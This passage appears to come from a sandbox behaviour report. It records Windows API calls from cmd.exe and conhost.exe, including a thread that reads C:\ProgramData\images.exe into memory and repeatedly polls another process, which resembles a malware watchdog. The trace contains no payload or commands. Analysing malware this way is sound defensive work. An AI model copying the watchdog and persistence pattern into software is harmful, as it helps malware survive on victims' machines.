(HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6105c8) returned 1 [0302.993] GetProcessHeap () returned 0x610000 [0302.993] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x61bc18 [0302.993] GetProcessHeap () returned 0x610000 [0302.994] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61bc18) returned 1 [0302.994] GetConsoleOutputCP () returned 0x1b5 [0304.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbcf460 | out: lpCPInfo=0xbcf460) returned 1 [0304.432] GetUserDefaultLCID () returned 0x409 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xbd34a0, cchData=8 | out: lpLCData=":") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xbd34b0, cchData=8 | out: lpLCData="/") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xbd3500, cchData=32 | out: lpLCData="Mon") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xbd3540, cchData=32 | out: lpLCData="Tue") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xbd3580, cchData=32 | out: lpLCData="Wed") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xbd35c0, cchData=32 | out: lpLCData="Thu") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xbd3600, cchData=32 | out: lpLCData="Fri") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xbd3640, cchData=32 | out: lpLCData="Sat") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xbd3680, cchData=32 | out: lpLCData="Sun") returned 4 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xbd34c0, cchData=8 | out: lpLCData=".") returned 2 [0304.433] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xbd34e0, cchData=8 | out: lpLCData=",") returned 2 [0304.433] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0304.435] GetProcessHeap () returned 0x610000 [0304.435] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x61a7e0 [0304.435] GetConsoleTitleW (in: lpConsoleTitle=0x61a7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0304.640] _get_osfhandle (_FileHandle=1) returned 0x3c [0304.640] GetFileType (hFile=0x3c) returned 0x2 [0304.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0304.640] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fe84 | out: lpMode=0x19fe84) returned 1 [0304.963] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0304.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x19fe9c | out: lpConsoleScreenBufferInfo=0x19fe9c) returned 1 [0305.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0305.151] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x19fe6c | out: lpConsoleScreenBufferInfo=0x19fe6c) returned 1 [0305.323] FillConsoleOutputAttribute (in: hConsoleOutput=0x3c, wAttribute=0x7, nLength=0x107b38, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x19fe64 | out: lpNumberOfAttrsWritten=0x19fe64) returned 1 [0305.445] SetConsoleTextAttribute (hConsoleOutput=0x3c, wAttributes=0x7) returned 1 [0305.535] ApiSetQueryApiSetPresence () returned 0x0 [0305.535] ResolveDelayLoadedAPI () returned 0x6d5c1cf0 [0306.728] BrandingFormatString () returned 0x610b58 [0306.941] GetVersion () returned 0x295a000a [0306.942] _vsnwprintf (in: _Buffer=0x19feb4, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x19fe7c | out: _Buffer="10.0.10586") returned 10 [0306.942] _get_osfhandle (_FileHandle=1) returned 0x3c [0306.942] GetFileType (hFile=0x3c) returned 0x2 [0306.942] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0306.942] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fdf8 | out: lpMode=0x19fdf8) returned 1 [0307.328] _get_osfhandle (_FileHandle=1) returned 0x3c [0307.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x19fe48 | out: lpConsoleScreenBufferInfo=0x19fe48) returned 1 [0307.702] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0xbd7940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0307.702] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0xbd7940, nSize=0x2000, Arguments=0x19fe78 | out: lpBuffer="Microsoft Windows [Version 10.0.10586]") returned 0x26 [0307.702] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbd7940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x19fe2c, lpReserved=0x0 | out: lpBuffer=0xbd7940*, lpNumberOfCharsWritten=0x19fe2c*=0x26) returned 1 [0307.826] _vsnwprintf (in: _Buffer=0xbd7940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19fe84 | out: _Buffer="\r\n") returned 2 [0307.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0307.826] GetFileType (hFile=0x3c) returned 0x2 [0307.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0307.826] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fe5c | out: lpMode=0x19fe5c) returned 1 [0308.241] _get_osfhandle (_FileHandle=1) returned 0x3c [0308.241] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbd7940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19fe74, lpReserved=0x0 | out: lpBuffer=0xbd7940*, lpNumberOfCharsWritten=0x19fe74*=0x2) returned 1 [0308.530] _vsnwprintf (in: _Buffer=0xbd7940, _BufferCount=0x1fff, _Format="%s", _ArgList=0x19fe8c | out: _Buffer="(c) 2016 Microsoft Corporation. All rights reserved.") returned 52 [0308.530] _get_osfhandle (_FileHandle=1) returned 0x3c [0308.530] GetFileType (hFile=0x3c) returned 0x2 [0308.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0308.530] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fe64 | out: lpMode=0x19fe64) returned 1 [0308.865] _get_osfhandle (_FileHandle=1) returned 0x3c [0308.865] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbd7940*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x19fe7c, lpReserved=0x0 | out: lpBuffer=0xbd7940*, lpNumberOfCharsWritten=0x19fe7c*=0x34) returned 1 [0309.040] _vsnwprintf (in: _Buffer=0xbd7940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19fe88 | out: _Buffer="\r\n") returned 2 [0309.040] _get_osfhandle (_FileHandle=1) returned 0x3c [0309.040] GetFileType (hFile=0x3c) returned 0x2 [0309.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0309.040] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fe60 | out: lpMode=0x19fe60) returned 1 [0309.282] _get_osfhandle (_FileHandle=1) returned 0x3c [0309.282] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbd7940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19fe78, lpReserved=0x0 | out: lpBuffer=0xbd7940*, lpNumberOfCharsWritten=0x19fe78*=0x2) returned 1 [0309.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74c90000 [0309.483] GetProcAddress (hModule=0x74c90000, lpProcName="CopyFileExW") returned 0x74caffc0 [0309.483] GetProcAddress (hModule=0x74c90000, lpProcName="IsDebuggerPresent") returned 0x74cab0b0 [0309.484] GetProcAddress (hModule=0x74c90000, lpProcName="SetConsoleInputExeNameW") returned 0x75bdb440 [0309.485] _get_osfhandle (_FileHandle=0) returned 0x38 [0309.485] GetFileType (hFile=0x38) returned 0x2 [0309.485] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0309.485] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x19fef4 | out: lpMode=0x19fef4) returned 1 [0309.703] NtOpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x19fcac | out: TokenHandle=0x19fcac*=0x0) returned 0xc000007c [0309.704] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fcac | out: TokenHandle=0x19fcac*=0xac) returned 0x0 [0309.704] NtQueryInformationToken (in: TokenHandle=0xac, TokenInformationClass=0x12, TokenInformation=0x19fc88, TokenInformationLength=0x4, ReturnLength=0x19fc84 | out: TokenInformation=0x19fc88, ReturnLength=0x19fc84) returned 0x0 [0309.704] NtQueryInformationToken (in: TokenHandle=0xac, TokenInformationClass=0x1a, TokenInformation=0x19fc88, TokenInformationLength=0x4, ReturnLength=0x19fc8c | out: TokenInformation=0x19fc88, ReturnLength=0x19fc8c) returned 0x0 [0309.704] NtClose (Handle=0xac) returned 0x0 [0309.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x19fca8, nSize=0x0, Arguments=0x19fca4 | out: lpBuffer="꼈aﻴ\x19䝒º❈䀀ÿ") returned 0xf [0309.704] GetProcessHeap () returned 0x610000 [0309.704] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x6184a8 [0309.704] GetConsoleTitleW (in: lpConsoleTitle=0x19fce0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0309.954] wcsstr (_Str="C:\\Windows\\System32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0309.954] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1 [0310.369] GetProcessHeap () returned 0x610000 [0310.369] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6184a8) returned 1 [0310.370] LocalFree (hMem=0x61af08) returned 0x0 [0310.370] GetProcessHeap () returned 0x610000 [0310.370] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x619b10) returned 1 [0310.370] _vsnwprintf (in: _Buffer=0xbd7940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19fb88 | out: _Buffer="\r\n") returned 2 [0310.370] _get_osfhandle (_FileHandle=1) returned 0x3c [0310.370] GetFileType (hFile=0x3c) returned 0x2 [0310.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0310.370] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fb60 | out: lpMode=0x19fb60) returned 1 [0310.624] _get_osfhandle (_FileHandle=1) returned 0x3c [0310.625] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbd7940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19fb78, lpReserved=0x0 | out: lpBuffer=0xbd7940*, lpNumberOfCharsWritten=0x19fb78*=0x2) returned 1 [0310.764] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xbcf4a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0310.764] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbd7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0310.764] _vsnwprintf (in: _Buffer=0xbcabe0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19fb84 | out: _Buffer="C:\\Windows\\system32") returned 19 [0310.764] _vsnwprintf (in: _Buffer=0xbcac06, _BufferCount=0x3eb, _Format="%c", _ArgList=0x19fb84 | out: _Buffer=">") returned 1 [0310.764] _get_osfhandle (_FileHandle=1) returned 0x3c [0310.764] GetFileType (hFile=0x3c) returned 0x2 [0310.765] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0310.765] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fb64 | out: lpMode=0x19fb64) returned 1 [0310.858] _get_osfhandle (_FileHandle=1) returned 0x3c [0310.858] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xbcabe0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x19fb7c, lpReserved=0x0 | out: lpBuffer=0xbcabe0*, lpNumberOfCharsWritten=0x19fb7c*=0x14) returned 1 [0310.957] _get_osfhandle (_FileHandle=0) returned 0x38 [0310.957] GetFileType (hFile=0x38) returned 0x2 [0310.957] _get_osfhandle (_FileHandle=0) returned 0x38 [0310.957] GetFileType (hFile=0x38) returned 0x2 [0310.957] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0310.957] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x19fe2c | out: lpMode=0x19fe2c) returned 1 [0311.126] _get_osfhandle (_FileHandle=0) returned 0x38 [0311.126] GetFileType (hFile=0x38) returned 0x2 [0311.126] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0311.127] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x19fe2c | out: lpMode=0x19fe2c) returned 1 [0311.281] _get_osfhandle (_FileHandle=0) returned 0x38 [0311.281] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0311.281] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x19fe7c | out: lpConsoleScreenBufferInfo=0x19fe7c) returned 1 [0311.420] ReadConsoleW (hConsoleInput=0x38, lpBuffer=0xbc67e0, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x19fe44, pInputControl=0x19fe6c) Thread: id = 79 os_tid = 0xd64 [0306.655] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74c90000 [0306.656] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77760000 [0306.656] LoadLibraryA (lpLibFileName="user32.dll") returned 0x756d0000 [0306.905] CreateFileA (lpFileName="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0306.905] GetFileSize (in: hFile=0xc4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0306.905] VirtualAlloc (lpAddress=0x0, dwSize=0x36600, flAllocationType=0x3000, flProtect=0x4) returned 0x580000 [0306.905] ReadFile (in: hFile=0xc4, lpBuffer=0x580000, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0x80ff28, lpOverlapped=0x0 | out: lpBuffer=0x580000*, lpNumberOfBytesRead=0x80ff28*=0x36600, lpOverlapped=0x0) returned 1 [0306.909] CloseHandle (hObject=0xc4) returned 1 [0306.910] Sleep (dwMilliseconds=0x2ee0) [0317.018] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xfb8) returned 0xac [0317.019] GetExitCodeProcess (in: hProcess=0xac, lpExitCode=0x80ff6c | out: lpExitCode=0x80ff6c*=0x103) returned 1 [0317.024] CloseHandle (hObject=0xac) returned 1 [0317.025] Sleep (dwMilliseconds=0x2ee0) Thread: id = 81 os_tid = 0xd18 Process: id = "20" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4bfae000" os_pid = "0x418" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x27c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2320 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2321 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2322 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2323 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2324 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2325 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2326 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2327 start_va = 0x7ff6965e0000 end_va = 0x7ff6965f0fff monitored = 0 entry_point = 0x7ff6965e16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2328 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2329 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 2330 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2331 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2332 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2333 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2334 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2335 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2336 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2343 start_va = 0x600000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2344 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2345 start_va = 0x7ff84f7a0000 end_va = 0x7ff84f7f8fff monitored = 0 entry_point = 0x7ff84f7afbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2346 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2347 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2348 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2349 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2350 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2351 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2352 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2353 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2354 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2355 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2356 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2357 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2392 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2393 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2394 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2395 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2396 start_va = 0x8d0000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2397 start_va = 0xa60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 2398 start_va = 0x1e60000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2405 start_va = 0x1e60000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 2406 start_va = 0x1f20000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 2407 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2408 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2409 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2410 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2411 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2412 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2426 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2427 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2428 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2429 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2430 start_va = 0x1f30000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 2445 start_va = 0x2000000 end_va = 0x2336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2446 start_va = 0x2340000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 2447 start_va = 0x2440000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2456 start_va = 0x1ea0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 2457 start_va = 0x7ff85c200000 end_va = 0x7ff85c359fff monitored = 0 entry_point = 0x7ff85c2438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2458 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2459 start_va = 0x1f30000 end_va = 0x1febfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 2460 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 